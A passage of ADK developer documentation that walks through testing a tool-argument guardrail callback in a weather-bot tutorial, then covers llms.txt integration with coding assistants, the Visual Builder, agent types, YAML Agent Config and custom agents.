SAME Stateful Session Service --- if 'session_service_stateful' in globals(): runner_root_tool_guardrail = Runner( agent=root_agent_tool_guardrail, app_name=APP_NAME, session_service=session_service_stateful # <<< Use the service from Step 4/5 ) print(f"✅ Runner created for tool guardrail agent '{runner_root_tool_guardrail.agent.name}', using stateful session service.") else: print("❌ Cannot create runner. 'session_service_stateful' from Step 4/5 is missing.") else: print("❌ Cannot create root agent with tool guardrail. Prerequisites missing.") ``` ______________________________________________________________________ **3. Interact to Test the Tool Guardrail** Let's test the interaction flow, again using the same stateful session (`SESSION_ID_STATEFUL`) from the previous steps. 1. Request weather for "New York": Passes both callbacks, tool executes (using Fahrenheit preference from state). 1. Request weather for "Paris": Passes `before_model_callback`. LLM decides to call `get_weather_stateful(city='Paris')`. `before_tool_callback` intercepts, blocks the tool, and returns the error dictionary. Agent relays this error. 1. Request weather for "London": Passes both callbacks, tool executes normally. ```python # @title 3. Interact to Test the Tool Argument Guardrail import asyncio # Ensure asyncio is imported # Ensure the runner for the tool guardrail agent is available if 'runner_root_tool_guardrail' in globals() and runner_root_tool_guardrail: # Define the main async function for the tool guardrail test conversation. # The 'await' keywords INSIDE this function are necessary for async operations. async def run_tool_guardrail_test(): print("\n--- Testing Tool Argument Guardrail ('Paris' blocked) ---") # Use the runner for the agent with both callbacks and the existing stateful session # Define a helper lambda for cleaner interaction calls interaction_func = lambda query: call_agent_async(query, runner_root_tool_guardrail, USER_ID_STATEFUL, # Use existing user ID SESSION_ID_STATEFUL # Use existing session ID ) # 1. Allowed city (Should pass both callbacks, use Fahrenheit state) print("--- Turn 1: Requesting weather in New York (expect allowed) ---") await interaction_func("What's the weather in New York?") # 2. Blocked city (Should pass model callback, but be blocked by tool callback) print("\n--- Turn 2: Requesting weather in Paris (expect blocked by tool guardrail) ---") await interaction_func("How about Paris?") # Tool callback should intercept this # 3. Another allowed city (Should work normally again) print("\n--- Turn 3: Requesting weather in London (expect allowed) ---") await interaction_func("Tell me the weather in London.") # --- Execute the `run_tool_guardrail_test` async function --- # Choose ONE of the methods below based on your environment. # METHOD 1: Direct await (Default for Notebooks/Async REPLs) # If your environment supports top-level await (like Colab/Jupyter notebooks), # it means an event loop is already running, so you can directly await the function. print("Attempting execution using 'await' (default for notebooks)...") await run_tool_guardrail_test() # METHOD 2: asyncio.run (For Standard Python Scripts [.py]) # If running this code as a standard Python script from your terminal, # the script context is synchronous. `asyncio.run()` is needed to # create and manage an event loop to execute your async function. # To use this method: # 1. Comment out the `await run_tool_guardrail_test()` line above. # 2. Uncomment the following block: """ import asyncio if __name__ == "__main__": # Ensures this runs only when script is executed directly print("Executing using 'asyncio.run()' (for standard Python scripts)...") try: # This creates an event loop, runs your async function, and closes the loop. asyncio.run(run_tool_guardrail_test()) except Exception as e: print(f"An error occurred: {e}") """ # --- Inspect final session state after the conversation --- # This block runs after either execution method completes. # Optional: Check state for the tool block trigger flag print("\n--- Inspecting Final Session State (After Tool Guardrail Test) ---") # Use the session service instance associated with this stateful session final_session = await session_service_stateful.get_session(app_name=APP_NAME, user_id=USER_ID_STATEFUL, session_id= SESSION_ID_STATEFUL) if final_session: # Use .get() for safer access print(f"Tool Guardrail Triggered Flag: {final_session.state.get('guardrail_tool_block_triggered', 'Not Set (or False)')}") print(f"Last Weather Report: {final_session.state.get('last_weather_report', 'Not Set')}") # Should be London weather if successful print(f"Temperature Unit: {final_session.state.get('user_preference_temperature_unit', 'Not Set')}") # Should be Fahrenheit # print(f"Full State Dict: {final_session.state}") # For detailed view else: print("\n❌ Error: Could not retrieve final session state.") else: print("\n⚠️ Skipping tool guardrail test. Runner ('runner_root_tool_guardrail') is not available.") ``` ______________________________________________________________________ Analyze the output: 1. **New York:** The `before_model_callback` allows the request. The LLM requests `get_weather_stateful`. The `before_tool_callback` runs, inspects the args (`{'city': 'New York'}`), sees it's not "Paris", prints "Allowing tool..." and returns `None`. The actual `get_weather_stateful` function executes, reads "Fahrenheit" from state, and returns the weather report. The agent relays this, and it gets saved via `output_key`. 1. **Paris:** The `before_model_callback` allows the request. The LLM requests `get_weather_stateful(city='Paris')`. The `before_tool_callback` runs, inspects the args, detects "Paris", prints "Blocking tool execution!", sets the state flag, and returns the error dictionary `{'status': 'error', 'error_message': 'Policy restriction...'}`. The actual `get_weather_stateful` function is **never executed**. The agent receives the error dictionary *as if it were the tool's output* and formulates a response based on that error message. 1. **London:** Behaves like New York, passing both callbacks and executing the tool successfully. The new London weather report overwrites the `last_weather_report` in the state. You've now added a crucial safety layer controlling not just *what* reaches the LLM, but also *how* the agent's tools can be used based on the specific arguments generated by the LLM. Callbacks like `before_model_callback` and `before_tool_callback` are essential for building robust, safe, and policy-compliant agent applications. ______________________________________________________________________ ## Conclusion: Your Agent Team is Ready! Congratulations! You've successfully journeyed from building a single, basic weather agent to constructing a sophisticated, multi-agent team using the Agent Development Kit (ADK). **Let's recap what you've accomplished:** - You started with a **fundamental agent** equipped with a single tool (`get_weather`). - You explored ADK's **multi-model flexibility** using LiteLLM, running the same core logic with different LLMs like Gemini, GPT-4o, and Claude. - You embraced **modularity** by creating specialized sub-agents (`greeting_agent`, `farewell_agent`) and enabling **automatic delegation** from a root agent. - You gave your agents **memory** using **Session State**, allowing them to remember user preferences (`temperature_unit`) and past interactions (`output_key`). - You implemented crucial **safety guardrails** using both `before_model_callback` (blocking specific input keywords) and `before_tool_callback` (blocking tool execution based on arguments like the city "Paris"). Through building this progressive Weather Bot team, you've gained hands-on experience with core ADK concepts essential for developing complex, intelligent applications. **Key Takeaways:** - **Agents & Tools:** The fundamental building blocks for defining capabilities and reasoning. Clear instructions and docstrings are paramount. - **Runners & Session Services:** The engine and memory management system that orchestrate agent execution and maintain conversational context. - **Delegation:** Designing multi-agent teams allows for specialization, modularity, and better management of complex tasks. Agent `description` is key for auto-flow. - **Session State (`ToolContext`, `output_key`):** Essential for creating context-aware, personalized, and multi-turn conversational agents. - **Callbacks (`before_model`, `before_tool`):** Powerful hooks for implementing safety, validation, policy enforcement, and dynamic modifications *before* critical operations (LLM calls or tool execution). - **Flexibility (`LiteLlm`):** ADK empowers you to choose the best LLM for the job, balancing performance, cost, and features. **Where to Go Next?** Your Weather Bot team is a great starting point. Here are some ideas to further explore ADK and enhance your application: 1. **Real Weather API:** Replace the `mock_weather_db` in your `get_weather` tool with a call to a real weather API (like OpenWeatherMap, WeatherAPI). 1. **More Complex State:** Store more user preferences (e.g., preferred location, notification settings) or conversation summaries in the session state. 1. **Refine Delegation:** Experiment with different root agent instructions or sub-agent descriptions to fine-tune the delegation logic. Could you add a "forecast" agent? 1. **Advanced Callbacks:** - Use `after_model_callback` to potentially reformat or sanitize the LLM's response *after* it's generated. - Use `after_tool_callback` to process or log the results returned by a tool. - Implement `before_agent_callback` or `after_agent_callback` for agent-level entry/exit logic. 1. **Error Handling:** Improve how the agent handles tool errors or unexpected API responses. Maybe add retry logic within a tool. 1. **Persistent Session Storage:** Explore alternatives to `InMemorySessionService` for storing session state persistently (e.g., using databases like Firestore or Cloud SQL – requires custom implementation or future ADK integrations). 1. **Streaming UI:** Integrate your agent team with a web framework (like FastAPI, as shown in the ADK Streaming Quickstart) to create a real-time chat interface. The Agent Development Kit provides a robust foundation for building sophisticated LLM-powered applications. By mastering the concepts covered in this tutorial – tools, state, delegation, and callbacks – you are well-equipped to tackle increasingly complex agentic systems. Happy building! # Coding with AI The Agent Development Kit (ADK) documentation supports the [`/llms.txt` standard](https://llmstxt.org/), providing a machine-readable index of the documentation optimized for Large Language Models (LLMs). This allows you to easily use the ADK documentation as context in your AI-powered development environment. ## What is llms.txt? `llms.txt` is a standardized text file that acts as a map for LLMs, listing the most important documentation pages and their descriptions. This helps AI tools understand the structure of the ADK documentation and retrieve relevant information to answer your questions. The ADK documentation provides the following files that are automatically generated with every update: | File | Best For... | URL | | ------------------- | ------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------- | | **`llms.txt`** | Tools that can fetch links dynamically | [`https://google.github.io/adk-docs/llms.txt`](https://google.github.io/adk-docs/llms.txt) | | **`llms-full.txt`** | Tools that need a single, static text dump of the entire site | [`https://google.github.io/adk-docs/llms-full.txt`](https://google.github.io/adk-docs/llms-full.txt) | ## Usage in Development Tools You can use these files to power your AI coding assistants with ADK knowledge. This functionality allows your agents to autonomously search and read the ADK documentation while planning tasks and generating code. ### Gemini CLI The [Gemini CLI](https://geminicli.com/) can be configured to query the ADK documentation using the [ADK Docs Extension](https://github.com/derailed-dash/adk-docs-ext). **Installation:** To install the extension, run the following command: ```bash gemini extensions install https://github.com/derailed-dash/adk-docs-ext ``` **Usage:** Once installed, the extension is automatically enabled. You can ask questions about ADK directly in the Gemini CLI, and it will use the `llms.txt` file and ADK documentation to provide accurate answers and generate code. For example, you can ask the following question from within Gemini CLI: > How do I create a function tool using Agent Development Kit? ______________________________________________________________________ ### Antigravity The [Antigravity](https://antigravity.google/) IDE can be configured to access the ADK documentation by running a custom MCP server that points to the `llms.txt` file for ADK. **Prerequisites:** Ensure you have the [`uv`](https://docs.astral.sh/uv/) tool installed, as this configuration uses `uvx` to run the documentation server without manual installation. **Configuration:** 1. Open the MCP store via the **...** (more) menu at the top of the editor's agent panel. 1. Click on **Manage MCP Servers**. 1. Click on **View raw config**. 1. Add the following entry to `mcp_config.json` with your custom MCP server configuration. If this is your first MCP server, you can paste the entire code block: ```json { "mcpServers": { "adk-docs-mcp": { "command": "uvx", "args": [ "--from", "mcpdoc", "mcpdoc", "--urls", "AgentDevelopmentKit:https://google.github.io/adk-docs/llms.txt", "--transport", "stdio" ] } } } ``` Refer to the [Antigravity MCP documentation](https://antigravity.google/docs/mcp) for more information on managing MCP servers. **Usage:** Once configured, you can prompt the coding agent with instructions like: > Use the ADK docs to build a multi-tool agent that uses Gemini 2.5 Pro and includes a mock weather lookup tool and a custom calculator tool. Verify the agent using `adk run`. ______________________________________________________________________ ### Claude Code [Claude Code](https://code.claude.com/docs/en/overview) can be configured to query the ADK documentation by adding an [MCP server](https://code.claude.com/docs/en/mcp). **Installation:** To add an MCP server for the ADK docs to Claude Code, run the following command: ```bash claude mcp add adk-docs --transport stdio -- uvx --from mcpdoc mcpdoc --urls AgentDevelopmentKit:https://google.github.io/adk-docs/llms.txt --transport stdio ``` **Usage:** Once installed, the MCP server is automatically enabled. You can ask questions about ADK directly in Claude Code, and it will use the `llms.txt` file and ADK documentation to provide accurate answers and generate code. For example, you can ask the following question from within Claude Code: > How do I create a function tool using Agent Development Kit? ______________________________________________________________________ ### Cursor The [Cursor](https://cursor.com/) IDE can be configured to access the ADK documentation by running a custom MCP server that points to the `llms.txt` file for ADK. **Prerequisites:** Ensure you have the [`uv`](https://docs.astral.sh/uv/) tool installed, as this configuration uses `uvx` to run the documentation server without manual installation. **Configuration:** 1. Open **Cursor Settings** and navigate to the **Tools & MCP** tab. 1. Click on **New MCP Server**, which will open `mcp.json` for editing. 1. Add the following entry to `mcp.json` with your custom MCP server configuration. If this is your first MCP server, you can paste the entire code block: ```json { "mcpServers": { "adk-docs-mcp": { "command": "uvx", "args": [ "--from", "mcpdoc", "mcpdoc", "--urls", "AgentDevelopmentKit:https://google.github.io/adk-docs/llms.txt", "--transport", "stdio" ] } } } ``` Refer to the [Cursor MCP documentation](https://cursor.com/docs/context/mcp) for more information on managing MCP servers. **Usage:** Once configured, you can prompt the coding agent with instructions like: > Use the ADK docs to build a multi-tool agent that uses Gemini 2.5 Pro and includes a mock weather lookup tool and a custom calculator tool. Verify the agent using `adk run`. ______________________________________________________________________ ### Other Tools Any tool that supports the `llms.txt` standard or can ingest documentation from a URL can benefit from these files. You can provide the URL `https://google.github.io/adk-docs/llms.txt` (or `llms-full.txt`) to your tool's knowledge base configuration or MCP server configuration. # Visual Builder for agents Supported in ADKPython v1.18.0Experimental The ADK Visual Builder is a web-based tool that provides a visual workflow design environment for creating and managing ADK agents. It allows you to design, build, and test your agents in a beginner-friendly graphical interface, and includes an AI-powered assistant to help you build agents. Experimental The Visual Builder feature is an experimental release. We welcome your [feedback](https://github.com/google/adk-python/issues/new?template=feature_request.md)! ## Get started The Visual Builder interface is part of the ADK Web tool user interface. Make sure you have ADK library [installed](/adk-docs/get-started/installation/#python) and then run the ADK Web user interface. ```console adk web --port 8000 ``` Tip: Run from a code development directory The Visual Builder tool writes project files to new subdirectories located in the directory where you run the ADK Web tool. Make sure you run this command from a developer directory location where you have write access. **Figure 1:** ADK Web controls to start the Visual Builder tool. To create an agent with Visual Builder: 1. In top left of the page, select the **+** (plus sign), as shown in *Figure 1*, to start creating an agent. 1. Type a name for your agent application and select **Create**. 1. Edit your agent by doing any of the following: - In the left panel, edit agent component values. - In the central panel, add new agent components . - In the right panel, use prompts to modify the agent or get help. 1. In bottom left corner, select **Save** to save your agent. 1. Interact with your new agent to test it. 1. In top left of the page, select the pencil icon, as shown in *Figure 1*, to continue editing your agent. Here are few things to note when using Visual Builder: - **Create agent and save:** When creating an agent, make sure you select **Save** before exiting the editing interface, otherwise your new agent may not be editable. - **Agent editing:** Edit (pencil icon) for agents is *only* available for agents created with Visual Builder - **Add tools:** When adding existing custom Tools to a Visual Builder agent, specify a fully-qualified Python function name. ## Workflow component support The Visual Builder tool provides a drag-and-drop user interface for constructing agents, as well as an AI-powered development Assistant that can answer questions and edit your agent workflow. The tool supports all the essential components for building an ADK agent workflow, including: - **Agents** - **Root Agent**: The primary controlling agent for a workflow. All other agents in an ADK agent workflow are considered Sub Agents. - [**LLM Agent:**](/adk-docs/agents/llm-agents/) An agent powered by a generative AI model. - [**Sequential Agent:**](/adk-docs/agents/workflow-agents/sequential-agents/) A workflow agent that executes a series of sub-agents in a sequence. - [**Loop Agent:**](/adk-docs/agents/workflow-agents/loop-agents/) A workflow agent that repeatedly executes a sub-agent until a certain condition is met. - [**Parallel Agent:**](/adk-docs/agents/workflow-agents/parallel-agents/) A workflow agent that executes multiple sub-agents concurrently. - **Tools** - [**Prebuilt tools:**](/adk-docs/tools/built-in-tools/) A limited set of ADK-provided tools can be added to agents. - [**Custom tools:**](/adk-docs/tools-custom/) You can build and add custom tools to your workflow. - **Components** - [**Callbacks**](/adk-docs/callbacks/) A flow control component that lets you modify the behavior of agents at the start and end of agent workflow events. Some advanced ADK features are not supported by Visual Builder due to limitations of the Agent Config feature. For more information, see the Agent Config [Known limitations](/adk-docs/agents/config/#known-limitations). ## Project code output The Visual Builder tool generates code in the [Agent Config](/adk-docs/agents/config/) format, using `.yaml` configuration files for agents and Python code for custom tools. These files are generated in a subfolder of the directory where you ran the ADK Web interface. The following listing shows an example layout for a DiceAgent project: ```text DiceAgent/ root_agent.yaml # main agent code sub_agent_1.yaml # sub agents (if any) tools/ # tools directory __init__.py dice_tool.py # tool code ``` Editing generated agents You can edit the generated files in your development environment. However, some changes may not be compatible with Visual Builder. ## Next steps Using the Visual Builder development Assistant, try building a new agent using this prompt: ```text Help me add a dice roll tool to my current agent. Use the default model if you need to configure that. ``` Check out more information on the Agent Config code format used by Visual Builder and the available options: - [Agent Config](/adk-docs/agents/config/) - [Agent Config YAML schema](/adk-docs/api-reference/agentconfig/) # Agents Supported in ADKPythonTypeScriptGoJava In Agent Development Kit (ADK), an **Agent** is a self-contained execution unit designed to act autonomously to achieve specific goals. Agents can perform tasks, interact with users, utilize external tools, and coordinate with other agents. The foundation for all agents in ADK is the `BaseAgent` class. It serves as the fundamental blueprint. To create functional agents, you typically extend `BaseAgent` in one of three main ways, catering to different needs – from intelligent reasoning to structured process control. ## Core Agent Categories ADK provides distinct agent categories to build sophisticated applications: 1. [**LLM Agents (`LlmAgent`, `Agent`)**](https://google.github.io/adk-docs/agents/llm-agents/index.md): These agents utilize Large Language Models (LLMs) as their core engine to understand natural language, reason, plan, generate responses, and dynamically decide how to proceed or which tools to use, making them ideal for flexible, language-centric tasks. [Learn more about LLM Agents...](https://google.github.io/adk-docs/agents/llm-agents/index.md) 1. [**Workflow Agents (`SequentialAgent`, `ParallelAgent`, `LoopAgent`)**](https://google.github.io/adk-docs/agents/workflow-agents/index.md): These specialized agents control the execution flow of other agents in predefined, deterministic patterns (sequence, parallel, or loop) without using an LLM for the flow control itself, perfect for structured processes needing predictable execution. [Explore Workflow Agents...](https://google.github.io/adk-docs/agents/workflow-agents/index.md) 1. [**Custom Agents**](https://google.github.io/adk-docs/agents/custom-agents/index.md): Created by extending `BaseAgent` directly, these agents allow you to implement unique operational logic, specific control flows, or specialized integrations not covered by the standard types, catering to highly tailored application requirements. [Discover how to build Custom Agents...](https://google.github.io/adk-docs/agents/custom-agents/index.md) ## Choosing the Right Agent Type The following table provides a high-level comparison to help distinguish between the agent types. As you explore each type in more detail in the subsequent sections, these distinctions will become clearer. | Feature | LLM Agent (`LlmAgent`) | Workflow Agent | Custom Agent (`BaseAgent` subclass) | | -------------------- | --------------------------------- | ------------------------------------------- | ----------------------------------------- | | **Primary Function** | Reasoning, Generation, Tool Use | Controlling Agent Execution Flow | Implementing Unique Logic/Integrations | | **Core Engine** | Large Language Model (LLM) | Predefined Logic (Sequence, Parallel, Loop) | Custom Code | | **Determinism** | Non-deterministic (Flexible) | Deterministic (Predictable) | Can be either, based on implementation | | **Primary Use** | Language tasks, Dynamic decisions | Structured processes, Orchestration | Tailored requirements, Specific workflows | ## Agents Working Together: Multi-Agent Systems While each agent type serves a distinct purpose, the true power often comes from combining them. Complex applications frequently employ [multi-agent architectures](https://google.github.io/adk-docs/agents/multi-agents/index.md) where: - **LLM Agents** handle intelligent, language-based task execution. - **Workflow Agents** manage the overall process flow using standard patterns. - **Custom Agents** provide specialized capabilities or rules needed for unique integrations. Understanding these core types is the first step toward building sophisticated, capable AI applications with ADK. ______________________________________________________________________ ## What's Next? Now that you have an overview of the different agent types available in ADK, dive deeper into how they work and how to use them effectively: - [**LLM Agents:**](https://google.github.io/adk-docs/agents/llm-agents/index.md) Explore how to configure agents powered by large language models, including setting instructions, providing tools, and enabling advanced features like planning and code execution. - [**Workflow Agents:**](https://google.github.io/adk-docs/agents/workflow-agents/index.md) Learn how to orchestrate tasks using `SequentialAgent`, `ParallelAgent`, and `LoopAgent` for structured and predictable processes. - [**Custom Agents:**](https://google.github.io/adk-docs/agents/custom-agents/index.md) Discover the principles of extending `BaseAgent` to build agents with unique logic and integrations tailored to your specific needs. - [**Multi-Agents:**](https://google.github.io/adk-docs/agents/multi-agents/index.md) Understand how to combine different agent types to create sophisticated, collaborative systems capable of tackling complex problems. - [**Models:**](/adk-docs/agents/models/) Learn about the different LLM integrations available and how to select the right model for your agents. # Build agents with Agent Config Supported in ADKPython v1.11.0Experimental The ADK Agent Config feature lets you build an ADK workflow without writing code. An Agent Config uses a YAML format text file with a brief description of the agent, allowing just about anyone to assemble and run an ADK agent. The following is a simple example of a basic Agent Config definition: ```text name: assistant_agent model: gemini-2.5-flash description: A helper agent that can answer users' questions. instruction: You are an agent to help answer users' various questions. ``` You can use Agent Config files to build more complex agents which can incorporate Functions, Tools, Sub-Agents, and more. This page describes how to build and run ADK workflows with the Agent Config feature. For detailed information on the syntax and settings supported by the Agent Config format, see the [Agent Config syntax reference](/adk-docs/api-reference/agentconfig/). Experimental The Agent Config feature is experimental and has some [known limitations](#known-limitations). We welcome your [feedback](https://github.com/google/adk-python/issues/new?template=feature_request.md&labels=agent%20config)! ## Get started This section describes how to set up and start building agents with the ADK and the Agent Config feature, including installation setup, building an agent, and running your agent. ### Setup You need to install the Google Agent Development Kit libraries, and provide an access key for a generative AI model such as Gemini API. This section provides details on what you must install and configure before you can run agents with the Agent Config files. Note The Agent Config feature currently only supports Gemini models. For more information about additional; functional restrictions, see [Known limitations](#known-limitations). To set up ADK for use with Agent Config: 1. Install the ADK Python libraries by following the [Installation](/adk-docs/get-started/installation/#python) instructions. *Python is currently required.* For more information, see the [Known limitations](#known-limitations). 1. Verify that ADK is installed by running the following command in your terminal: ```text adk --version ``` This command should show the ADK version you have installed. Tip If the `adk` command fails to run and the version is not listed in step 2, make sure your Python environment is active. Execute `source .venv/bin/activate` in your terminal on Mac and Linux. For other platform commands, see the [Installation](/adk-docs/get-started/installation/#python) page. ### Build an agent You build an agent with Agent Config using the `adk create` command to create the project files for an agent, and then editing the `root_agent.yaml` file it generates for you. To create an ADK project for use with Agent Config: 1. In your terminal window, run the following command to create a config-based agent: ```text adk create --type=config my_agent ``` This command generates a `my_agent/` folder, containing a `root_agent.yaml` file and an `.env` file. 1. In the `my_agent/.env` file, set environment variables for your agent to access generative AI models and other services: 1. For Gemini model access through Google API, add a line to the file with your API key: ```text GOOGLE_GENAI_USE_VERTEXAI=0 GOOGLE_API_KEY= ``` You can get an API key from the Google AI Studio [API Keys](https://aistudio.google.com/app/apikey) page. 1. For Gemini model access through Google Cloud, add these lines to the file: ```text GOOGLE_GENAI_USE_VERTEXAI=1 GOOGLE_CLOUD_PROJECT= GOOGLE_CLOUD_LOCATION=us-central1 ``` For information on creating a Cloud Project, see the Google Cloud docs for [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects). 1. Using text editor, edit the Agent Config file `my_agent/root_agent.yaml`, as shown below: ```text # yaml-language-server: $schema=https://raw.githubusercontent.com/google/adk-python/refs/heads/main/src/google/adk/agents/config_schemas/AgentConfig.json name: assistant_agent model: gemini-2.5-flash description: A helper agent that can answer users' questions. instruction: You are an agent to help answer users' various questions. ``` You can discover more configuration options for your `root_agent.yaml` agent configuration file by referring to the ADK [samples repository](https://github.com/search?q=repo%3Agoogle%2Fadk-python+path%3A%2F%5Econtributing%5C%2Fsamples%5C%2F%2F+.yaml&type=code) or the [Agent Config syntax](/adk-docs/api-reference/agentconfig/) reference. ### Run the agent Once you have completed editing your Agent Config, you can run your agent using the web interface, command line terminal execution, or API server mode. To run your Agent Config-defined agent: 1. In your terminal, navigate to the `my_agent/` directory containing the `root_agent.yaml` file. 1. Type one of the following commands to run your agent: - `adk web` - Run web UI interface for your agent. - `adk run` - Run your agent in the terminal without a user interface. - `adk api_server` - Run your agent as a service that can be used by other applications. For more information on the ways to run your agent, see the *Run Your Agent* topic in the [Quickstart](/adk-docs/get-started/quickstart/#run-your-agent). For more information about the ADK command line options, see the [ADK CLI reference](/adk-docs/api-reference/cli/). ## Example configs This section shows examples of Agent Config files to get you started building agents. For additional and more complete examples, see the ADK [samples repository](https://github.com/search?q=repo%3Agoogle%2Fadk-python+path%3A%2F%5Econtributing%5C%2Fsamples%5C%2F%2F+root_agent.yaml&type=code). ### Built-in tool example The following example uses a built-in ADK tool function for using google search to provide functionality to the agent. This agent automatically uses the search tool to reply to user requests. ```text # yaml-language-server: $schema=https://raw.githubusercontent.com/google/adk-python/refs/heads/main/src/google/adk/agents/config_schemas/AgentConfig.json name: search_agent model: gemini-2.0-flash description: 'an agent whose job it is to perform Google search queries and answer questions about the results.' instruction: You are an agent whose job is to perform Google search queries and answer questions about the results. tools: - name: google_search ``` For more details, see the full code for this sample in the [ADK sample repository](https://github.com/google/adk-python/blob/main/contributing/samples/tool_builtin_config/root_agent.yaml). ### Custom tool example The following example uses a custom tool built with Python code and listed in the `tools:` section of the config file. The agent uses this tool to check if a list of numbers provided by the user are prime numbers. ```text # yaml-language-server: $schema=https://raw.githubusercontent.com/google/adk-python/refs/heads/main/src/google/adk/agents/config_schemas/AgentConfig.json agent_class: LlmAgent model: gemini-2.5-flash name: prime_agent description: Handles checking if numbers are prime. instruction: | You are responsible for checking whether numbers are prime. When asked to check primes, you must call the check_prime tool with a list of integers. Never attempt to determine prime numbers manually. Return the prime number results to the root agent. tools: - name: ma_llm.check_prime ``` For more details, see the full code for this sample in the [ADK sample repository](https://github.com/google/adk-python/blob/main/contributing/samples/multi_agent_llm_config/prime_agent.yaml). ### Sub-agents example The following example shows an agent defined with two sub-agents in the `sub_agents:` section, and an example tool in the `tools:` section of the config file. This agent determines what the user wants, and delegates to one of the sub-agents to resolve the request. The sub-agents are defined using Agent Config YAML files. ```text # yaml-language-server: $schema=https://raw.githubusercontent.com/google/adk-python/refs/heads/main/src/google/adk/agents/config_schemas/AgentConfig.json agent_class: LlmAgent model: gemini-2.5-flash name: root_agent description: Learning assistant that provides tutoring in code and math. instruction: | You are a learning assistant that helps students with coding and math questions. You delegate coding questions to the code_tutor_agent and math questions to the math_tutor_agent. Follow these steps: 1. If the user asks about programming or coding, delegate to the code_tutor_agent. 2. If the user asks about math concepts or problems, delegate to the math_tutor_agent. 3. Always provide clear explanations and encourage learning. sub_agents: - config_path: code_tutor_agent.yaml - config_path: math_tutor_agent.yaml ``` For more details, see the full code for this sample in the [ADK sample repository](https://github.com/google/adk-python/blob/main/contributing/samples/multi_agent_basic_config/root_agent.yaml). ## Deploy agent configs You can deploy Agent Config agents with [Cloud Run](/adk-docs/deploy/cloud-run/) and [Agent Engine](/adk-docs/deploy/agent-engine/), using the same procedure as code-based agents. For more information on how to prepare and deploy Agent Config-based agents, see the [Cloud Run](/adk-docs/deploy/cloud-run/) and [Agent Engine](/adk-docs/deploy/agent-engine/) deployment guides. ## Known limitations The Agent Config feature is experimental and includes the following limitations: - **Model support:** Only Gemini models are currently supported. Integration with third-party models is in progress. - **Programming language:** The Agent Config feature currently supports only Python code for tools and other functionality requiring programming code. - **ADK Tool support:** The following ADK tools are supported by the Agent Config feature, but *not all tools are fully supported*: - `google_search` - `load_artifacts` - `url_context` - `exit_loop` - `preload_memory` - `get_user_choice` - `enterprise_web_search` - `load_web_page`: Requires a fully-qualified path to access web pages. - **Agent Type Support:** The `LangGraphAgent` and `A2aAgent` types are not yet supported. - `AgentTool` - `LongRunningFunctionTool` - `VertexAiSearchTool` - `McpToolset` - `ExampleTool` ## Next steps For ideas on how and what to build with ADK Agent Configs, see the yaml-based agent definitions in the ADK [adk-samples](https://github.com/search?q=repo:google/adk-python+path:/%5Econtributing%5C/samples%5C//+root_agent.yaml&type=code) repository. For detailed information on the syntax and settings supported by the Agent Config format, see the [Agent Config syntax reference](/adk-docs/api-reference/agentconfig/). # Custom agents Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 Custom agents provide the ultimate flexibility in ADK, allowing you to define **arbitrary orchestration logic** by inheriting directly from `BaseAgent` and implementing your own control flow. This goes beyond the predefined patterns of `SequentialAgent`, `LoopAgent`, and `ParallelAgent`, enabling you to build highly specific and complex agentic workflows. Advanced Concept Building custom agents by directly implementing `_run_async_impl` (or its equivalent in other languages) provides powerful control but is more complex than using the predefined `LlmAgent` or standard `WorkflowAgent` types. We recommend understanding those foundational agent types first before tackling custom orchestration logic. ## Introduction: Beyond Predefined Workflows ### What is a Custom Agent? A Custom Agent is essentially any class you create that inherits from `google.adk.agents.BaseAgent` and implements its core execution logic within the `_run_async_impl` asynchronous method. You have complete control over how this method calls other agents (sub-agents), manages state, and handles events. Note The specific method name for implementing an agent's core asynchronous logic may vary slightly by SDK language (e.g., `runAsyncImpl` in Java, `_run_async_impl` in Python, or `runAsyncImpl` in TypeScript). Refer to the language-specific API documentation for details. ### Why Use Them? While the standard [Workflow Agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md) (`SequentialAgent`, `LoopAgent`, `ParallelAgent`) cover common orchestration patterns, you'll need a Custom agent when your requirements include: - **Conditional Logic:** Executing different sub-agents or taking different paths based on runtime conditions or the results of previous steps. - **Complex State Management:** Implementing intricate logic for maintaining and updating state throughout the workflow beyond simple sequential passing. - **External Integrations:** Incorporating calls to external APIs, databases, or custom libraries directly within the orchestration flow control. - **Dynamic Agent Selection:** Choosing which sub-agent(s) to run next based on dynamic evaluation of the situation or input. - **Unique Workflow Patterns:** Implementing orchestration logic that doesn't fit the standard sequential, parallel, or loop structures. ## Implementing Custom Logic: The core of any custom agent is the method where you define its unique asynchronous behavior. This method allows you to orchestrate sub-agents and manage the flow of execution. The heart of any custom agent is the `_run_async_impl` method. This is where you define its unique behavior. - **Signature:** `async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]:` - **Asynchronous Generator:** It must be an `async def` function and return an `AsyncGenerator`. This allows it to `yield` events produced by sub-agents or its own logic back to the runner. - **`ctx` (InvocationContext):** Provides access to crucial runtime information, most importantly `ctx.session.state`, which is the primary way to share data between steps orchestrated by your custom agent. The heart of any custom agent is the `runAsyncImpl` method. This is where you define its unique behavior. - **Signature:** `async* runAsyncImpl(ctx: InvocationContext): AsyncGenerator` - **Asynchronous Generator:** It must be an `async` generator function (`async*`). - **`ctx` (InvocationContext):** Provides access to crucial runtime information, most importantly `ctx.session.state`, which is the primary way to share data between steps orchestrated by your custom agent. In Go, you implement the `Run` method as part of a struct that satisfies the `agent.Agent` interface. The actual logic is typically a method on your custom agent struct. - **Signature:** `Run(ctx agent.InvocationContext) iter.Seq2[*session.Event, error]` - **Iterator:** The `Run` method returns an iterator (`iter.Seq2`) that yields events and errors. This is the standard way to handle streaming results from an agent's execution. - **`ctx` (InvocationContext):** The `agent.InvocationContext` provides access to the session, including state, and other crucial runtime information. - **Session State:** You can access the session state through `ctx.Session().State()`. The heart of any custom agent is the `runAsyncImpl` method, which you override from `BaseAgent`. - **Signature:** `protected Flowable runAsyncImpl(InvocationContext ctx)` - **Reactive Stream (`Flowable`):** It must return an `io.reactivex.rxjava3.core.Flowable`. This `Flowable` represents a stream of events that will be produced by the custom agent's logic, often by combining or transforming multiple `Flowable` from sub-agents. - **`ctx` (InvocationContext):** Provides access to crucial runtime information, most importantly `ctx.session().state()`, which is a `java.util.concurrent.ConcurrentMap`. This is the primary way to share data between steps orchestrated by your custom agent. **Key Capabilities within the Core Asynchronous Method:** 1. **Calling Sub-Agents:** You invoke sub-agents (which are typically stored as instance attributes like `self.my_llm_agent`) using their `run_async` method and yield their events: ```python async for event in self.some_sub_agent.run_async(ctx): # Optionally inspect or log the event yield event # Pass the event up ``` 1. 